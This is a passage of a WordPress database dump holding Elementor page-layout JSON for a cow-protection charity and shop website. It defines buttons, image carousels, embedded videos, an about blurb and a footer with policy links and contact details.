"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12143,1995,'_elementor_page_assets','a:0:{}'),(12146,1996,'_elementor_edit_mode','builder'),(12147,1996,'_elementor_template_type','wp-page'),(12148,1996,'_elementor_version','3.7.8'),(12149,1996,'_wp_page_template','elementor_canvas'),(12150,1996,'_elementor_data','[{\"id\":\"b112c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1ae7508\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"74e98db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d2498f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8894245\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7bcdc84\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\